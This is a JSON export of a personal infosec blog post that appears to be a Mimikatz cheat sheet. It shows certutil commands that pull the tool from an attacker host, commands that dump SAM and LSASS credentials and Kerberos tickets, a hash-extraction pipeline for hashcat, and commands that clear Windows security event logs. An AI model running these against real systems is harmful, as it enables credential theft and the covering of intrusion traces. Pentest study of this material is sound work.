{"id":1315,"date":"2020-04-26T09:11:50","date_gmt":"2020-04-26T07:11:50","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=1315"},"modified":"2024-09-08T10:57:19","modified_gmt":"2024-09-08T08:57:19","slug":"mimikatz","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=1315","title":{"rendered":"Mimikatz"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Win\u00addows cre\u00adates and stores cre\u00adden\u00adtials in the Local Secu\u00adri\u00adty Author\u00adi\u00adty Sub\u00adsys\u00adtem Ser\u00advice <span class=\"caps\">LSASS<\/span> in the mem\u00ado\u00adry. On the filesys\u00adtem, the <em>sam<\/em> data\u00adbase stores the hashes.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Use Mimikatz<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>as stand\u00adalone\n<ul class=\"wp-block-list\">\n<li>If you need to copy the files:\n<pre>certutil.exe -urlcache -split -f \"http:\/\/192.168.119.158:8000\/mimidrv.sys\" mimidrv.sys\ncertutil.exe -urlcache -split -f \"http:\/\/192.168.119.158:8000\/mimikatz.exe\" mimikatz.exe\ncertutil.exe -urlcache -split -f \"http:\/\/192.168.119.158:8000\/mimilib.dll\" mimilib.dll<\/pre>\n<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>as Meter\u00adpreter mod\u00adule <pre>load mimikatz<br>mimikatz_command -f samdump::hashes<br>mimikatz_command -f sekurlsa::searchPasswords<br>mimikatz_command -f sekurlsa::logonPasswords<\/pre><pre>...<\/pre><\/li>\n\n\n\n<li>as Pow\u00ader\u00adShellEm\u00adpire module<\/li>\n\n\n\n<li>Mul\u00adti\u00adple com\u00admands can be used for non-inter\u00adac\u00adtive exe\u00adcu\u00adtion.<br><code>mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit<br>mimikatz.exe \"privilege::debug\" \"lsadump::sam\" exit<\/code><\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">Usage<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Enable debug mode. This usess the <em>SeDe\u00adbug\u00adPriv\u00adi\u00adlege<\/em> so that we are able to com\u00admu\u00adni\u00adcate with oth\u00ader processes.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">privilege:debug<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Try to ele\u00advate priv\u00adi\u00adleges to obtain <span class=\"caps\">SYSTEM<\/span> user privileges:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">token::elevate<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Get con\u00adtents of the <span class=\"caps\">SAM<\/span> database<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">lsadump::sam<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Dump con\u00adtent of the&nbsp;<span class=\"caps\">LSASS<\/span>.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sekurlsa::logonpasswords<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Tip: Use the fol\u00adlow\u00ading bash line to extract the pass\u00adwords to get a file for hash\u00adcat:\n<pre>cat securlsa_logonpasswords.txt | grep NTLM | cut -d\" \" -f9 | uniq\ncat securlsa_logonpasswords.txt | grep SHA1 | cut -d\" \" -f9 | uniq<\/pre>\n<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Get (Ker\u00adberos) tickets:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Con\u00adnect to a sys\u00adtem via Ker\u00adberos. For exam\u00adple, try to list a share:<br><code>PS&gt; dir \\\\host.dom.ain\\backup<\/code><\/li>\n\n\n\n<li>Now, list the tick\u00adets:<br><code>sekurlsa::tickets<\/code><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Kerberos<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Ask for a <span class=\"caps\">TGS<\/span> tick\u00adet from a service.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Requires:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>User account<\/li>\n\n\n\n<li>Ser\u00advi\u00adceprin\u00adci\u00adpal\u00adname of a service<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">kerberos::ask \/target:HTTP\/svMSSQL.svcorp.com<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Various<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">Delete event&nbsp;logs<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Clear all (!) secu\u00adri\u00adty event&nbsp;logs<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">privilege::debug\nevent::drop\nevent::clear<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Ressources<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/adsecurity.org\/?page_id=1821\">Huge ref\u00ader\u00adence<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Win\u00addows cre\u00adates and stores cre\u00adden\u00adtials in the Local Secu\u00adri\u00adty Author\u00adi\u00adty Sub\u00adsys\u00adtem Ser\u00advice <span class=\"caps\">LSASS<\/span> in the mem\u00ado\u00adry. On the filesys\u00adtem, the sam data\u00adbase stores the hash\u00ades. Use Mimikatz Usage Enable debug mode. This usess the SeDe\u00adbug\u00adPriv\u00adi\u00adlege so that we are able to com\u00admu\u00adni\u00adcate with oth\u00ader process\u00ades. privilege:debug Try to ele\u00advate priv\u00adi\u00adleges to obtain <span class=\"caps\">SYSTEM<\/span> user privileges:&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[471,472],"tags":[194,50,259,24],"class_list":["post-1315","post","type-post","status-publish","format-standard","hentry","category-privesc","category-postexp","tag-active-directory","tag-enumeration","tag-mimikatz","tag-windows"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1315","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1315"}],"version-history":[{"count":15,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1315\/revisions"}],"predecessor-version":[{"id":4306,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1315\/revisions\/4306"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1315"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1315"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1315"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}